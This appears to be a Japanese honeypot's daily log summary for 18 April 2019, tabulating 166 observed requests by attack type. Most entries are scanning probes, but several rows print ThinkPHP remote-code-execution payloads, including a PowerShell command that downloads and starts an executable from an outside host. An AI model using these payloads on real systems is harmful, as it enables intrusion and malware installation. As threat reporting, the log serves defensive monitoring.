BW-Potのログ分析 (2019/04/18)
本日の総アクセス件数は166件です。送信元IP数は85IPです。
新規の通信は観測できませんでした。
| 件数 | 種別 | リクエスト |
| 72 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 63 | アクセス | GET / |
| 3 | Amazon EC2 インスタンスメタデータの調査 | GET 169.254.169[.]254/latest/meta-data |
| 2 | 不正中継の調査 | GET www.msftncsi[.]com/ncsi.txt |
| 2 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 2 | 不明 | OPTIONS / |
| 1 | Cisco製ルータの脆弱性(CVE-2019-1653)に関する攻撃 | GET /cgi-bin/config.exp |
| 1 | D-Link デバイスに関する調査 | GET /HNAP1/ |
| 1 | Joomla!に関する調査 | GET /administrator/index.php |
| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php |
| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/mlmlvvtftdxevaq1768.exe');start%20C:/Windows/temp/mlmlvvtftdxevaq1768.exe |
| 1 | ThinkPHPに関する攻撃 | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/mlmlvvtftdxevaq1768.exe');start%20C:/Windows/temp/mlmlvvtftdxevaq1768.exe |
| 1 | ThinkPHPに関する調査 | GET /TP/public/index.php |
| 1 | Tomato RAFに関する調査 | GET /admin-scripts.asp |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | WordPressに関する調査 | GET /blog/wp-login.php |
| 1 | WordPressに関する調査 | GET /cms/wp-login.php |
| 1 | WordPressに関する調査 | GET /wordpress/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp1/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp2/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp3/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp4/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp5/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp6/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp7/wp-login.php |
| 1 | WordPressに関する調査 | GET /wp8/wp-login.php |
| 1 | 環境設定の調査 | GET /.env |
